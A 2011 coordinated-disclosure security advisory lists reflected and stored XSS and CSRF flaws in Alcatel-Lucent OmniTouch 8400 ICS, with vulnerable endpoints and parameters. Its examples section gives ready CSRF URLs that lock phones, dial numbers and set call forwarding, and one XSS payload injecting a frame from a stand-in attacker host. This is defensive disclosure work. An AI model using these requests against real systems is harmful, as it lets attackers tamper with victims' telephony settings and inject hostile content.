OmniTouch Instant Communication Suite XSRF / XSS

`TC-SA-2011-01: Multiple vulnerabilities in OmniTouch Instant Communication  
Suite  
  
Published: 2011/10/24  
Advisory-Version: 1.0  
  
References:   
- Alcatel Lucent Vulnerability Statement 2011003 Multiple vulnerabilities  
in OmniTouch Instant Communication Suite  
- CVE-2011-4058 - multiple XSS vulnerabilities in Alcatel-Lucent  
OmniTouch 8400 Instant Communication Suite   
- CVE-2011-4059 - multiple CSRF vulnerabilities in Alcatel-Lucent  
OmniTouch 8400 Instant Communication Suite   
- Cert-IST reference number: Cert-IST/AV-2011.583   
- URL of this advisory (used for updates):  
http://www.tele-consulting.com/advisories/TC-SA-2011-01.txt  
  
Affected products:  
Alcatel Lucent OmniTouch 8400 Instant Communications  
Suite (ICS) Version 6.1 Patch 102a  
(older releases have not been tested)  
  
Summary:  
Alcatel Lucent's ICS offers Unified Communication services  
over several access ways, like handhelds and web-clients.  
The web-client WebICS offers end users services like access  
to personal and global address books, initiate calls, call  
redirects etc.  
Several common flaws could be found in WebICS like reflected  
and stored XSS as well as CSRF. In Webadmin reflected XSS  
could be found.  
  
Possible Effects:  
One could use a stored XSS in the phonebook and change the  
end users phone configuration like DND or call redirect.  
  
Vulnerable Scripts WebICS:  
CSRF  
- /websoftphone/servlet/DispPhoneSet  
- /websoftphone/servlet/DispRTC  
- /websoftphone/servlet/DispPhoneSet  
  
stored XSS:  
- all Input-Fields of the phonebook  
  
reflected XSS:  
  
- /websoftphone/jsp/CBCallBackCont.jsp, parameter list  
- /websoftphone/jsp/PhoneBookCont.jsp, parameter udatab  
- /websoftphone/jsp/CustoData.jsp, parameter openwin  
- /websoftphone/jsp/RTCNavigator.jsp, parameter sessionid  
- /websoftphone/servlet/DispLogon, parameter next  
- /websoftphone/servlet/DispLogon, parameter main  
  
  
Vulnerable Scripts WebAdmin:  
reflected XSS:  
- /ClientMgmt/ClientMgmt, parameter action  
  
Examples CSRF:  
- Lock a phone  
https://webics.yourdomain.local/websoftphone/servlet/ \  
DispPhoneSet?method=setLock  
  
- Dial  
https://webics.yourdomain.local/websoftphone/servlet/ \  
DispRTC?method=makeCall&number=XXXX  
  
- Set DND  
https://webics.yourdomain.local/websoftphone/servlet/ \  
DispPhoneSet?method=setDoNotDisturb  
  
- Set call forward  
https://webics.yourdomain.local/websoftphone/servlet/ \  
DispPhoneSet?method=setForward&type=immediate& \  
FwdTarget=onSomeone&number=xxxx  
  
https://webics.yourdomain.local/websoftphone/jsp/ \  
CBCallBackCont.jsp?list=%22%3E%3CFRAME%20SRC=%22 \  
http://www.boeserangreifer.de%22%3E%3C&rand=0  
  
Possible solutions:  
- install the vendor supplied hotfix  
  
Disclosure Timeline:  
2011/02/17 vendor contacted via [email protected]  
2011/02/18 initial vendor response   
2011/06/27 vendor sent an internal advisory to business partners for  
some reflected XSS issues  
2011/07/20 vendor sent an updated internal advisory to business  
partners included a hotfix for some reflected XSS issues  
2011/09/06 vendor sent an updated internal advisory to business  
partners  
2011/09/26 vendor sent an updated internal advisory to business  
partners addressing all issues  
2011/10/24 coordinated public disclosure  
  
Credits:  
Tobias Glemser ([email protected])  
Tele-Consulting security networking training GmbH, Germany  
www.tele-consulting.com  
  
Disclaimer:  
All information is provided without warranty. The intent is to   
provide information to secure infrastructure and/or systems, not  
to be able to attack or damage. Therefore Tele-Consulting shall   
not be liable for any direct or indirect damages that might be   
caused by using this information.  
  
  
`